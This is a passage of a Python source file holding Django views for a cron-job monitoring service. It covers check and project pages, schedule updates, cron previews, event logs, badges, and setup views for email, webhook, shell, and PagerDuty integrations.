from hc.accounts.models import Project, Member
from hc.api.models import (
DEFAULT_GRACE,
DEFAULT_TIMEOUT,
MAX_DELTA,
Channel,
Check,
Ping,
Notification,
)
from hc.api.transports import Telegram
from hc.front.decorators import require_setting
from hc.front import forms
from hc.front.schemas import telegram_callback
from hc.front.templatetags.hc_extras import (
num_down_title,
down_title,
sortchecks,
site_hostname,
site_scheme,
)
from hc.lib import jsonschema
from hc.lib.badges import get_badge_url
import pytz
from pytz.exceptions import UnknownTimeZoneError
import requests
# Sort keys accepted from the "?sort=" query parameter (see my_checks below).
VALID_SORT_VALUES = ("name", "-name", "last_ping", "-last_ping", "created")
# Templates loaded once at module import time.
STATUS_TEXT_TMPL = get_template("front/log_status_text.html")
LAST_PING_TMPL = get_template("front/last_ping_cell.html")
EVENTS_TMPL = get_template("front/details_events.html")
DOWNTIMES_TMPL = get_template("front/details_downtimes.html")
def _tags_statuses(checks):
tags, down, grace, num_down = {}, {}, {}, 0
for check in checks:
status = check.get_status()
if status == "down":
num_down += 1
for tag in check.tags_list():
down[tag] = "down"
elif status == "grace":
for tag in check.tags_list():
grace[tag] = "grace"
else:
for tag in check.tags_list():
tags[tag] = "up"
tags.update(grace)
tags.update(down)
return tags, num_down
def _get_check_for_user(request, code):
    """ Return (check, rw) if the current user can access the check.

    Raises Http404 when the check does not exist or the user is not a
    member of its project.
    """
    assert request.user.is_authenticated
    check = get_object_or_404(Check.objects.select_related("project"), code=code)
    # Superusers and the project's owner always get read-write access.
    if request.user.is_superuser or request.user.id == check.project.owner_id:
        return check, True
    # Everybody else must be a member; the membership carries the rw flag.
    member = get_object_or_404(Member, project=check.project, user=request.user)
    return check, member.rw
def _get_rw_check_for_user(request, code):
    """ Return the check, requiring read-write access. """
    check, rw = _get_check_for_user(request, code)
    if rw:
        return check
    raise PermissionDenied
def _get_channel_for_user(request, code):
    """ Return (channel, rw) if the current user can access the channel.

    Raises Http404 when the channel does not exist or the user is not a
    member of its project.
    """
    assert request.user.is_authenticated
    channel = get_object_or_404(Channel.objects.select_related("project"), code=code)
    # Superusers and the project's owner always get read-write access.
    if request.user.is_superuser or request.user.id == channel.project.owner_id:
        return channel, True
    # Everybody else must be a member; the membership carries the rw flag.
    member = get_object_or_404(Member, project=channel.project, user=request.user)
    return channel, member.rw
def _get_rw_channel_for_user(request, code):
    """ Return the channel, requiring read-write access. """
    channel, rw = _get_channel_for_user(request, code)
    if rw:
        return channel
    raise PermissionDenied
def _get_project_for_user(request, project_code):
    """ Check access, return (project, rw) tuple. """
    project = get_object_or_404(Project, code=project_code)
    # Superusers and the owner always get read-write access.
    if request.user.is_superuser or request.user.id == project.owner_id:
        return project, True
    # Everybody else must be a member; the membership carries the rw flag.
    member = get_object_or_404(Member, project=project, user=request.user)
    return project, member.rw
def _get_rw_project_for_user(request, project_code):
    """ Return the project, requiring read-write access. """
    project, rw = _get_project_for_user(request, project_code)
    if rw:
        return project
    raise PermissionDenied
def _refresh_last_active_date(profile):
    """ Bump profile.last_active_date when it is unset or over a day old. """
    now = timezone.now()
    stale = (
        profile.last_active_date is None
        or (now - profile.last_active_date).days > 0
    )
    if stale:
        profile.last_active_date = now
        profile.save()
@login_required
def my_checks(request, code):
    """ Render the project's checks list ("My Checks" page).

    Side effects: refreshes the profile's last_active_date, persists a
    valid "?sort=" preference on the profile, and remembers the project
    id in the session.
    """
    _refresh_last_active_date(request.profile)
    project, rw = _get_project_for_user(request, code)
    # Persist a requested (and valid) sort preference on the user's profile.
    if request.GET.get("sort") in VALID_SORT_VALUES:
        request.profile.sort = request.GET["sort"]
        request.profile.save()
    # Remember the most recently viewed project in the session.
    if request.session.get("last_project_id") != project.id:
        request.session["last_project_id"] = project.id
    q = Check.objects.filter(project=project)
    checks = list(q.prefetch_related("channel_set"))
    sortchecks(checks, request.profile.sort)
    # Per-tag worst status, plus the number of checks currently down.
    tags_statuses, num_down = _tags_statuses(checks)
    pairs = list(tags_statuses.items())
    pairs.sort(key=lambda pair: pair[0].lower())
    channels = Channel.objects.filter(project=project)
    channels = list(channels.order_by("created"))
    hidden_checks = set()
    # Hide checks that don't match selected tags:
    selected_tags = set(request.GET.getlist("tag", []))
    if selected_tags:
        for check in checks:
            if not selected_tags.issubset(check.tags_list()):
                hidden_checks.add(check)
    # Hide checks that don't match the search string:
    search = request.GET.get("search", "")
    if search:
        for check in checks:
            # Matches against the lowercased name and the check's code.
            search_key = "%s\n%s" % (check.name.lower(), check.code)
            if search not in search_key:
                hidden_checks.add(check)
    # Do we need to show the "Last Duration" header?
    show_last_duration = False
    for check in checks:
        if check.clamped_last_duration():
            show_last_duration = True
            break
    ctx = {
        "page": "checks",
        "rw": rw,
        "checks": checks,
        "channels": channels,
        "num_down": num_down,
        "tags": pairs,
        "ping_endpoint": settings.PING_ENDPOINT,
        "timezones": pytz.all_timezones,
        "project": project,
        "num_available": project.num_checks_available(),
        "sort": request.profile.sort,
        "selected_tags": selected_tags,
        "search": search,
        "hidden_checks": hidden_checks,
        "show_last_duration": show_last_duration,
    }
    return render(request, "front/my_checks.html", ctx)
@login_required
def status(request, code):
    """ Return the current status of the project's checks as JSON. """
    # Called for the access check only -- the return value is not needed:
    _get_project_for_user(request, code)
    checks = list(Check.objects.filter(project__code=code))
    details = []
    for check in checks:
        ctx = {"check": check}
        details.append(
            {
                "code": str(check.code),
                "status": check.get_status(),
                "last_ping": LAST_PING_TMPL.render(ctx),
                "started": check.last_start is not None,
            }
        )
    tags_statuses, num_down = _tags_statuses(checks)
    return JsonResponse(
        {"details": details, "tags": tags_statuses, "title": num_down_title(num_down)}
    )
@login_required
@require_POST
def switch_channel(request, code, channel_code):
    """ Assign or unassign a channel to a check, per the "state" POST field. """
    check = _get_rw_check_for_user(request, code)
    channel = get_object_or_404(Channel, code=channel_code)
    # The channel must belong to the same project as the check:
    if channel.project_id != check.project_id:
        return HttpResponseBadRequest()
    if request.POST.get("state") == "on":
        channel.checks.add(check)
    else:
        channel.checks.remove(check)
    return HttpResponse()
def index(request):
    """ Render the projects overview for signed-in users, or the welcome page. """
    if request.user.is_authenticated:
        projects = list(request.profile.projects())
        ctx = {
            "page": "projects",
            "projects": projects,
            "last_project_id": request.session.get("last_project_id"),
        }
        return render(request, "front/projects.html", ctx)
    # Anonymous visitors get the welcome page with an unsaved sample check.
    # The enable_* flags mirror which integrations are configured in settings:
    check = Check()
    ctx = {
        "page": "welcome",
        "check": check,
        "ping_url": check.url(),
        "enable_apprise": settings.APPRISE_ENABLED is True,
        "enable_call": settings.TWILIO_AUTH is not None,
        "enable_discord": settings.DISCORD_CLIENT_ID is not None,
        "enable_linenotify": settings.LINENOTIFY_CLIENT_ID is not None,
        "enable_matrix": settings.MATRIX_ACCESS_TOKEN is not None,
        "enable_mattermost": settings.MATTERMOST_ENABLED is True,
        "enable_msteams": settings.MSTEAMS_ENABLED is True,
        "enable_opsgenie": settings.OPSGENIE_ENABLED is True,
        "enable_pagertree": settings.PAGERTREE_ENABLED is True,
        "enable_pd": settings.PD_ENABLED is True,
        "enable_pdc": settings.PD_VENDOR_KEY is not None,
        "enable_prometheus": settings.PROMETHEUS_ENABLED is True,
        "enable_pushbullet": settings.PUSHBULLET_CLIENT_ID is not None,
        "enable_pushover": settings.PUSHOVER_API_TOKEN is not None,
        "enable_shell": settings.SHELL_ENABLED is True,
        "enable_signal": settings.SIGNAL_CLI_ENABLED is True,
        "enable_slack": settings.SLACK_ENABLED is True,
        "enable_slack_btn": settings.SLACK_CLIENT_ID is not None,
        "enable_sms": settings.TWILIO_AUTH is not None,
        "enable_spike": settings.SPIKE_ENABLED is True,
        "enable_telegram": settings.TELEGRAM_TOKEN is not None,
        "enable_trello": settings.TRELLO_APP_KEY is not None,
        "enable_victorops": settings.VICTOROPS_ENABLED is True,
        "enable_webhooks": settings.WEBHOOKS_ENABLED is True,
        "enable_whatsapp": settings.TWILIO_USE_WHATSAPP,
        "enable_zulip": settings.ZULIP_ENABLED is True,
        "registration_open": settings.REGISTRATION_OPEN,
    }
    return render(request, "front/welcome.html", ctx)
def dashboard(request):
    """ Render the dashboard page. """
    ctx = {}
    return render(request, "front/dashboard.html", ctx)
def serve_doc(request, doc="introduction"):
    """ Serve a documentation page from templates/docs/.

    Raises Http404 when the page name contains anything other than
    lowercase letters and underscores, or the file does not exist.
    """
    # Filenames in /templates/docs/ consist of lowercase letters and underscores,
    # -- make sure we don't accept anything else
    if not re.match(r"^[a-z_]+$", doc):
        raise Http404("not found")

    path = os.path.join(settings.BASE_DIR, "templates/docs", doc + ".html")
    if not os.path.exists(path):
        raise Http404("not found")

    # Use a context manager so the file handle is closed promptly
    # (the original left the handle open until garbage collection):
    with open(path, "r", encoding="utf-8") as f:
        content = f.read()

    # Substitute placeholders; the self_hosted_* pages are served verbatim:
    if not doc.startswith("self_hosted"):
        replaces = {
            "{{ default_timeout }}": str(int(DEFAULT_TIMEOUT.total_seconds())),
            "{{ default_grace }}": str(int(DEFAULT_GRACE.total_seconds())),
            "SITE_NAME": settings.SITE_NAME,
            "SITE_ROOT": settings.SITE_ROOT,
            "SITE_HOSTNAME": site_hostname(),
            "SITE_SCHEME": site_scheme(),
            "PING_ENDPOINT": settings.PING_ENDPOINT,
            "PING_URL": settings.PING_ENDPOINT + "your-uuid-here",
            "IMG_URL": os.path.join(settings.STATIC_URL, "img/docs"),
        }

        for placeholder, value in replaces.items():
            content = content.replace(placeholder, value)

    ctx = {
        "page": "docs",
        "section": doc,
        "content": content,
        "first_line": content.split("\n")[0],
    }
    return render(request, "front/docs_single.html", ctx)
def docs_cron(request):
    """ Render the cron syntax documentation page. """
    ctx = {}
    return render(request, "front/docs_cron.html", ctx)
@require_POST
@login_required
def add_check(request, code):
    """ Create a new check in the project and redirect to its details page. """
    project = _get_rw_project_for_user(request, code)
    # Respect the account's check limit:
    if project.num_checks_available() <= 0:
        return HttpResponseBadRequest()
    check = Check(project=project)
    check.save()
    check.assign_all_channels()
    url = reverse("hc-details", args=[check.code])
    # The "?new" query parameter marks the check as freshly created:
    return redirect(url + "?new")
@require_POST
@login_required
def update_name(request, code):
    """ Update the check's name, tags and description from a submitted form. """
    check = _get_rw_check_for_user(request, code)
    form = forms.NameTagsForm(request.POST)
    if form.is_valid():
        check.name = form.cleaned_data["name"]
        check.tags = form.cleaned_data["tags"]
        check.desc = form.cleaned_data["desc"]
        check.save()
    # Redirect back to whichever page the form was submitted from:
    if "/details/" in request.META.get("HTTP_REFERER", ""):
        return redirect("hc-details", code)
    return redirect("hc-checks", check.project.code)
@require_POST
@login_required
def filtering_rules(request, code):
    """ Update the check's filtering rules from a submitted form. """
    check = _get_rw_check_for_user(request, code)
    form = forms.FilteringRulesForm(request.POST)
    if form.is_valid():
        check.subject = form.cleaned_data["subject"]
        check.subject_fail = form.cleaned_data["subject_fail"]
        check.methods = form.cleaned_data["methods"]
        check.manual_resume = form.cleaned_data["manual_resume"]
        check.save()
    return redirect("hc-details", code)
@require_POST
@login_required
def update_timeout(request, code):
    """ Update the check's schedule ("simple" or "cron" kind) from a form. """
    check = _get_rw_check_for_user(request, code)
    kind = request.POST.get("kind")
    if kind == "simple":
        form = forms.TimeoutForm(request.POST)
        if not form.is_valid():
            return HttpResponseBadRequest()
        check.kind = "simple"
        check.timeout = form.cleaned_data["timeout"]
        check.grace = form.cleaned_data["grace"]
    elif kind == "cron":
        form = forms.CronForm(request.POST)
        if not form.is_valid():
            return HttpResponseBadRequest()
        check.kind = "cron"
        check.schedule = form.cleaned_data["schedule"]
        check.tz = form.cleaned_data["tz"]
        check.grace = td(minutes=form.cleaned_data["grace"])
    # Recalculate the deadline under the new schedule:
    check.alert_after = check.going_down_after()
    if check.status == "up" and check.alert_after < timezone.now():
        # Checks can flip from "up" to "down" state as a result of changing check's
        # schedule. We don't want to send notifications when changing schedule
        # interactively in the web UI. So we update the `alert_after` and `status`
        # fields here the same way as `sendalerts` would do, but without sending
        # an actual alert:
        check.alert_after = None
        check.status = "down"
    check.save()
    # Redirect back to whichever page the form was submitted from:
    if "/details/" in request.META.get("HTTP_REFERER", ""):
        return redirect("hc-details", code)
    return redirect("hc-checks", check.project.code)
@require_POST
def cron_preview(request):
    """ Render a preview of the next 6 run times for a cron schedule.

    Sets ctx["bad_tz"] for an unknown timezone, ctx["bad_schedule"] for a
    schedule croniter cannot parse.
    """
    schedule = request.POST.get("schedule", "")
    tz = request.POST.get("tz")
    ctx = {"tz": tz, "dates": []}

    try:
        zone = pytz.timezone(tz)
        now_local = timezone.localtime(timezone.now(), zone)

        # croniter also accepts 6-field schedules; we only allow 5 fields:
        if len(schedule.split()) != 5:
            raise ValueError()

        it = croniter(schedule, now_local)
        for i in range(0, 6):
            ctx["dates"].append(it.get_next(datetime))
    except UnknownTimeZoneError:
        ctx["bad_tz"] = True
    except Exception:
        # Narrowed from a bare "except:" -- a bare except would also
        # swallow SystemExit and KeyboardInterrupt:
        ctx["bad_schedule"] = True

    if ctx["dates"]:
        try:
            descriptor = ExpressionDescriptor(schedule, use_24hour_time_format=True)
            ctx["desc"] = descriptor.get_description()
        except Exception:
            # We assume the schedule is valid if croniter accepts it.
            # If cron-descriptor throws an exception, don't show the description
            # to the user.
            pass

    return render(request, "front/cron_preview.html", ctx)
@login_required
def ping_details(request, code, n=None):
    """ Render details of a single ping of the check.

    If n is given, show the ping with that serial number;
    otherwise show the most recent ping.
    """
    check, rw = _get_check_for_user(request, code)
    q = Ping.objects.filter(owner=check)
    if n:
        q = q.filter(n=n)
    try:
        ping = q.latest("created")
    except Ping.DoesNotExist:
        return render(request, "front/ping_details_not_found.html")
    ctx = {"check": check, "ping": ping}
    return render(request, "front/ping_details.html", ctx)
@require_POST
@login_required
def pause(request, code):
    """ Set the check's status to "paused" and clear its alert state. """
    check = _get_rw_check_for_user(request, code)
    check.status = "paused"
    check.last_start = None
    check.alert_after = None
    check.save()
    # Don't redirect after an AJAX request:
    if request.META.get("HTTP_X_REQUESTED_WITH") == "XMLHttpRequest":
        return HttpResponse()
    return redirect("hc-details", code)
@require_POST
@login_required
def resume(request, code):
    """ Reset the check to the "new" state, clearing ping and alert fields. """
    check = _get_rw_check_for_user(request, code)
    check.status = "new"
    check.last_start = None
    check.last_ping = None
    check.alert_after = None
    check.save()
    return redirect("hc-details", code)
@require_POST
@login_required
def remove_check(request, code):
    """ Delete the check and return to the project's checks page. """
    check = _get_rw_check_for_user(request, code)
    # Grab the project reference before the check is deleted:
    project = check.project
    check.delete()
    return redirect("hc-checks", project.code)
def _get_events(check, limit):
    """ Return the check's most recent pings and "down" notifications,
    sorted newest-first.

    Each ping that ends a measured run gets a `delta` attribute with the
    time elapsed since the preceding "start" ping (if under MAX_DELTA).
    """
    pings = list(Ping.objects.filter(owner=check).order_by("-id")[:limit])

    # Walk pings oldest-to-newest and annotate run durations:
    prev = None
    for ping in reversed(pings):
        if prev is not None and prev.kind == "start" and ping.kind != "start":
            delta = ping.created - prev.created
            if delta < MAX_DELTA:
                setattr(ping, "delta", delta)
        prev = ping

    # Only include notifications newer than the oldest displayed ping:
    alerts = []
    if pings:
        cutoff = pings[-1].created
        alerts = Notification.objects.select_related("channel").filter(
            owner=check, check_status="down", created__gt=cutoff
        )

    events = pings + list(alerts)
    events.sort(key=lambda event: event.created, reverse=True)
    return events
@login_required
def log(request, code):
    """ Render the check's event log (pings and notifications). """
    check, rw = _get_check_for_user(request, code)
    # The number of displayed entries is capped by the owner's plan limit:
    limit = check.project.owner_profile.ping_log_limit
    ctx = {
        "project": check.project,
        "check": check,
        "events": _get_events(check, limit),
        "limit": limit,
        "show_limit_notice": check.n_pings > limit and settings.USE_PAYMENTS,
    }
    return render(request, "front/log.html", ctx)
@login_required
def details(request, code):
    """ Render the check's details page. """
    _refresh_last_active_date(request.profile)
    check, rw = _get_check_for_user(request, code)
    channels = Channel.objects.filter(project=check.project)
    channels = list(channels.order_by("created"))
    # Collect every tag used in the project, for the tag autocomplete:
    all_tags = set()
    q = Check.objects.filter(project=check.project).exclude(tags="")
    for tags in q.values_list("tags", flat=True):
        all_tags.update(tags.split(" "))
    ctx = {
        "page": "details",
        "project": check.project,
        "check": check,
        "rw": rw,
        "channels": channels,
        "enabled_channels": list(check.channel_set.all()),
        "timezones": pytz.all_timezones,
        "downtimes": check.downtimes(months=3),
        "is_new": "new" in request.GET,
        "is_copied": "copied" in request.GET,
        "all_tags": " ".join(sorted(all_tags)),
    }
    return render(request, "front/details.html", ctx)
@login_required
def transfer(request, code):
    """ Move the check to another project the user has write access to.

    GET renders the transfer modal; POST performs the transfer.
    """
    check = _get_rw_check_for_user(request, code)
    if request.method == "POST":
        target_project = _get_rw_project_for_user(request, request.POST["project"])
        # Respect the target project's check limit:
        if target_project.num_checks_available() <= 0:
            return HttpResponseBadRequest()
        check.project = target_project
        check.save()
        check.assign_all_channels()
        messages.success(request, "Check transferred successfully!")
        return redirect("hc-details", code)
    ctx = {"check": check}
    return render(request, "front/transfer_modal.html", ctx)
@require_POST
@login_required
def copy(request, code):
    """ Duplicate the check (settings and channels) within its project. """
    check = _get_rw_check_for_user(request, code)
    # Respect the account's check limit:
    if check.project.num_checks_available() <= 0:
        return HttpResponseBadRequest()
    new_name = check.name + " (copy)"
    # Make sure we don't exceed the 100 character db field limit:
    if len(new_name) > 100:
        new_name = check.name[:90] + "... (copy)"
    copied = Check(project=check.project)
    copied.name = new_name
    copied.desc, copied.tags = check.desc, check.tags
    copied.subject, copied.subject_fail = check.subject, check.subject_fail
    copied.methods = check.methods
    copied.manual_resume = check.manual_resume
    copied.kind = check.kind
    copied.timeout, copied.grace = check.timeout, check.grace
    copied.schedule, copied.tz = check.schedule, check.tz
    copied.save()
    # The copy gets the same notification channels as the original:
    copied.channel_set.add(*check.channel_set.all())
    url = reverse("hc-details", args=[copied.code])
    return redirect(url + "?copied")
@login_required
def status_single(request, code):
    """ Return the check's current status as JSON. """
    check, rw = _get_check_for_user(request, code)
    status = check.get_status()
    events = _get_events(check, 20)
    updated = "1"
    if len(events):
        updated = str(events[0].created.timestamp())
    doc = {
        "status": status,
        "status_text": STATUS_TEXT_TMPL.render({"check": check, "rw": rw}),
        "title": down_title(check),
        "updated": updated,
    }
    # Include the rendered events and downtimes only if the client's copy
    # (passed in the "u" query parameter) is out of date:
    if updated != request.GET.get("u"):
        doc["events"] = EVENTS_TMPL.render({"check": check, "events": events})
        doc["downtimes"] = DOWNTIMES_TMPL.render({"downtimes": check.downtimes(3)})
    return JsonResponse(doc)
@login_required
def badges(request, code):
    """ Render the project's "Badges" page, listing badge URLs per tag. """
    project, rw = _get_project_for_user(request, code)
    tags = set()
    for check in Check.objects.filter(project=project):
        tags.update(check.tags_list())
    sorted_tags = sorted(tags, key=lambda s: s.lower())
    sorted_tags.append("*")  # For the "overall status" badge
    key = project.badge_key
    urls = []
    # For each tag, generate badge URLs in every supported format:
    for tag in sorted_tags:
        urls.append(
            {
                "tag": tag,
                "svg": get_badge_url(key, tag),
                "svg3": get_badge_url(key, tag, with_late=True),
                "json": get_badge_url(key, tag, fmt="json"),
                "json3": get_badge_url(key, tag, fmt="json", with_late=True),
                "shields": get_badge_url(key, tag, fmt="shields"),
                "shields3": get_badge_url(key, tag, fmt="shields", with_late=True),
            }
        )
    ctx = {
        "have_tags": len(urls) > 1,
        "page": "badges",
        "project": project,
        "badges": urls,
    }
    return render(request, "front/badges.html", ctx)
@login_required
def channels(request, code):
    """ Render the project's "Integrations" page.

    POST updates which checks are assigned to a given channel.
    """
    project, rw = _get_project_for_user(request, code)
    if request.method == "POST":
        if not rw:
            return HttpResponseForbidden()
        code = request.POST["channel"]
        try:
            channel = Channel.objects.get(code=code)
        except Channel.DoesNotExist:
            return HttpResponseBadRequest()
        # The channel must belong to this project:
        if channel.project_id != project.id:
            return HttpResponseForbidden()
        # Collect the checks selected via "check-<uuid>" POST keys:
        new_checks = []
        for key in request.POST:
            if key.startswith("check-"):
                code = key[6:]
                try:
                    check = Check.objects.get(code=code)
                except Check.DoesNotExist:
                    return HttpResponseBadRequest()
                # Each selected check must also belong to this project:
                if check.project_id != project.id:
                    return HttpResponseForbidden()
                new_checks.append(check)
        channel.checks.set(new_checks)
        return redirect("hc-channels", project.code)
    channels = Channel.objects.filter(project=project)
    channels = channels.order_by("created")
    channels = channels.annotate(n_checks=Count("checks"))
    # The enable_* flags mirror which integrations are configured in settings:
    ctx = {
        "page": "channels",
        "rw": rw,
        "project": project,
        "profile": project.owner_profile,
        "channels": channels,
        "enable_apprise": settings.APPRISE_ENABLED is True,
        "enable_call": settings.TWILIO_AUTH is not None,
        "enable_discord": settings.DISCORD_CLIENT_ID is not None,
        "enable_linenotify": settings.LINENOTIFY_CLIENT_ID is not None,
        "enable_matrix": settings.MATRIX_ACCESS_TOKEN is not None,
        "enable_mattermost": settings.MATTERMOST_ENABLED is True,
        "enable_msteams": settings.MSTEAMS_ENABLED is True,
        "enable_opsgenie": settings.OPSGENIE_ENABLED is True,
        "enable_pagertree": settings.PAGERTREE_ENABLED is True,
        "enable_pd": settings.PD_ENABLED is True,
        "enable_pdc": settings.PD_VENDOR_KEY is not None,
        "enable_prometheus": settings.PROMETHEUS_ENABLED is True,
        "enable_pushbullet": settings.PUSHBULLET_CLIENT_ID is not None,
        "enable_pushover": settings.PUSHOVER_API_TOKEN is not None,
        "enable_shell": settings.SHELL_ENABLED is True,
        "enable_signal": settings.SIGNAL_CLI_ENABLED is True,
        "enable_slack": settings.SLACK_ENABLED is True,
        "enable_slack_btn": settings.SLACK_CLIENT_ID is not None,
        "enable_sms": settings.TWILIO_AUTH is not None,
        "enable_spike": settings.SPIKE_ENABLED is True,
        "enable_telegram": settings.TELEGRAM_TOKEN is not None,
        "enable_trello": settings.TRELLO_APP_KEY is not None,
        "enable_victorops": settings.VICTOROPS_ENABLED is True,
        "enable_webhooks": settings.WEBHOOKS_ENABLED is True,
        "enable_whatsapp": settings.TWILIO_USE_WHATSAPP,
        "enable_zulip": settings.ZULIP_ENABLED is True,
        "use_payments": settings.USE_PAYMENTS,
    }
    return render(request, "front/channels.html", ctx)
@login_required
def channel_checks(request, code):
    """ Render the modal for assigning checks to the channel. """
    channel = _get_rw_channel_for_user(request, code)
    # Codes of the checks currently assigned to this channel:
    assigned = set(channel.checks.values_list("code", flat=True).distinct())
    checks = Check.objects.filter(project=channel.project).order_by("created")
    ctx = {"checks": checks, "assigned": assigned, "channel": channel}
    return render(request, "front/channel_checks.html", ctx)
@require_POST
@login_required
def update_channel_name(request, code):
    """ Update the channel's display name from a submitted form. """
    channel = _get_rw_channel_for_user(request, code)
    form = forms.ChannelNameForm(request.POST)
    if form.is_valid():
        channel.name = form.cleaned_data["name"]
        channel.save()
    return redirect("hc-channels", channel.project.code)
def verify_email(request, code, token):
    """ Mark the email channel verified if the supplied token matches. """
    channel = get_object_or_404(Channel, code=code)
    if channel.make_token() == token:
        channel.email_verified = True
        channel.save()
        return render(request, "front/verify_email_success.html")
    return render(request, "bad_link.html")
@csrf_exempt
def unsubscribe_email(request, code, signed_token):
    """ Delete the email channel after the recipient confirms unsubscribing. """
    # Some email servers open links in emails to check for malicious content.
    # To work around this, on GET requests we serve a confirmation form.
    # If the signature is at least 5 minutes old, we also include JS code to
    # auto-submit the form.
    ctx = {}
    # A ":" in the token means it carries a timestamp signature:
    if ":" in signed_token:
        signer = signing.TimestampSigner(salt="alerts")
        # First, check the signature without looking at the timestamp:
        try:
            token = signer.unsign(signed_token)
        except signing.BadSignature:
            return render(request, "bad_link.html")
        # Check if timestamp is older than 5 minutes:
        try:
            signer.unsign(signed_token, max_age=300)
        except signing.SignatureExpired:
            ctx["autosubmit"] = True
    else:
        token = signed_token
    channel = get_object_or_404(Channel, code=code, kind="email")
    if channel.make_token() != token:
        return render(request, "bad_link.html")
    # On GET, show the confirmation form; only POST performs the deletion:
    if request.method != "POST":
        return render(request, "accounts/unsubscribe_submit.html", ctx)
    channel.delete()
    return render(request, "front/unsubscribe_success.html")
@require_POST
@login_required
def send_test_notification(request, code):
    """ Send a test notification ("TEST is DOWN") through the channel. """
    channel, rw = _get_channel_for_user(request, code)
    # Build an unsaved dummy check to notify about:
    dummy = Check(name="TEST", status="down", project=channel.project)
    dummy.last_ping = timezone.now() - td(days=1)
    dummy.n_pings = 42
    if channel.kind == "webhook" and not channel.url_down:
        if channel.url_up:
            # If we don't have url_down, but do have have url_up then
            # send "TEST is UP" notification instead:
            dummy.status = "up"
    # Delete all older test notifications for this channel
    Notification.objects.filter(channel=channel, owner=None).delete()
    # Send the test notification
    error = channel.notify(dummy, is_test=True)
    if error:
        messages.warning(request, "Could not send a test notification. %s" % error)
    else:
        messages.success(request, "Test notification sent!")
    return redirect("hc-channels", channel.project.code)
@require_POST
@login_required
def remove_channel(request, code):
    """ Delete the channel and return to the project's integrations page. """
    channel = _get_rw_channel_for_user(request, code)
    # Grab the project reference before the channel is deleted:
    project = channel.project
    channel.delete()
    return redirect("hc-channels", project.code)
@login_required
def add_email(request, code):
    """ Add an email integration to the project.

    GET renders the form; POST creates the channel and, unless verification
    can be skipped, sends a verification link to the supplied address.
    """
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddEmailForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="email")
            channel.value = json.dumps(
                {
                    "value": form.cleaned_data["value"],
                    "up": form.cleaned_data["up"],
                    "down": form.cleaned_data["down"],
                }
            )
            channel.save()
            channel.assign_all_checks()
            is_own_email = form.cleaned_data["value"] == request.user.email
            if is_own_email or not settings.EMAIL_USE_VERIFICATION:
                # If user is subscribing *their own* address
                # we can skip the verification step.
                # Additionally, in self-hosted setting, administator has the
                # option to disable the email verification step altogether.
                channel.email_verified = True
                channel.save()
            else:
                channel.send_verify_link()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddEmailForm()
    ctx = {
        "page": "channels",
        "project": project,
        "use_verification": settings.EMAIL_USE_VERIFICATION,
        "form": form,
    }
    return render(request, "integrations/add_email.html", ctx)
@require_setting("WEBHOOKS_ENABLED")
@login_required
def add_webhook(request, code):
    """ Add a webhook integration to the project. """
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.WebhookForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="webhook")
            channel.name = form.cleaned_data["name"]
            channel.value = form.get_value()
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.WebhookForm()
    ctx = {
        "page": "channels",
        "project": project,
        "form": form,
    }
    return render(request, "integrations/webhook_form.html", ctx)
@login_required
def edit_webhook(request, code):
    """ Edit an existing webhook integration.

    GET pre-populates the form from the channel's stored JSON value;
    POST saves the updated definition.
    """
    channel = _get_rw_channel_for_user(request, code)
    if channel.kind != "webhook":
        return HttpResponseBadRequest()
    if request.method == "POST":
        form = forms.WebhookForm(request.POST)
        if form.is_valid():
            channel.name = form.cleaned_data["name"]
            channel.value = form.get_value()
            channel.save()
            return redirect("hc-channels", channel.project.code)
    else:
        # Convert a headers dict to the "Key: Value" lines the form expects:
        def flatten(d):
            return "\n".join("%s: %s" % pair for pair in d.items())
        doc = json.loads(channel.value)
        doc["headers_down"] = flatten(doc["headers_down"])
        doc["headers_up"] = flatten(doc["headers_up"])
        doc["name"] = channel.name
        form = forms.WebhookForm(doc)
    ctx = {
        "page": "channels",
        "project": channel.project,
        "channel": channel,
        "form": form,
    }
    return render(request, "integrations/webhook_form.html", ctx)
@require_setting("SHELL_ENABLED")
@login_required
def add_shell(request, code):
    """ Add a shell-command integration to the project. """
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddShellForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="shell")
            channel.value = form.get_value()
            channel.save()
            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddShellForm()
    ctx = {
        "page": "channels",
        "project": project,
        "form": form,
    }
    return render(request, "integrations/add_shell.html", ctx)
@require_setting("PD_ENABLED")
@login_required
def add_pd(request, code):
    """ Add a PagerDuty integration to the project. """
    project = _get_rw_project_for_user(request, code)
    if request.method == "POST":
        form = forms.AddPdForm(request.POST)
        if form.is_valid():
            channel = Channel(project=project, kind="pd")
            channel.value = form.cleaned_data["value"]
            channel.save()

            channel.assign_all_checks()
            return redirect("hc-channels", project.code)
    else:
        form = forms.AddPdForm()

    # Include "project" in the template context, consistent with the other
    # add_* views (the original ctx omitted it):
    ctx = {"page": "channels", "project": project, "form": form}
    return render(request, "integrations/add_pd.html", ctx)
@require_setting("PD_ENABLED")
@require_setting("PD_VENDOR_KEY")
def pdc_help(request):
    """ Render the PagerDuty Connect page for anonymous visitors. """
    return render(request, "integrations/add_pdc.html", {"page": "channels"})
@require_setting("PD_ENABLED")
@require_setting("PD_VENDOR_KEY")
@login_required
def add_pdc(request, code):
    """ Start the PagerDuty Connect flow for the project.

    Stores a random state token in the session; add_pdc_complete checks
    it when PagerDuty redirects back.
    """
    project = _get_rw_project_for_user(request, code)
    state = token_urlsafe()
    callback = settings.SITE_ROOT + reverse(
        "hc-add-pdc-complete", args=[project.code, state]
    )
    connect_url = "https://connect.pagerduty.com/connect?" + urlencode(
        {"vendor": settings.PD_VENDOR_KEY, "callback": callback}
    )
    ctx = {"page": "channels", "project": project, "connect_url": connect_url}
    request.session["pd"] = state
    return render(request, "integrations/add_pdc.html", ctx)
@require_setting("PD_ENABLED")
@require_setting("PD_VENDOR_KEY")
@login_required
def add_pdc_complete(request, code, state):
    """ Finish the PagerDuty Connect flow started in add_pdc. """
    if "pd" not in request.session:
        return HttpResponseBadRequest()
    project = _get_rw_project_for_user(request, code)
    # The state in the callback URL must match the one stored in the session:
    session_state = request.session.pop("pd")
    if session_state != state:
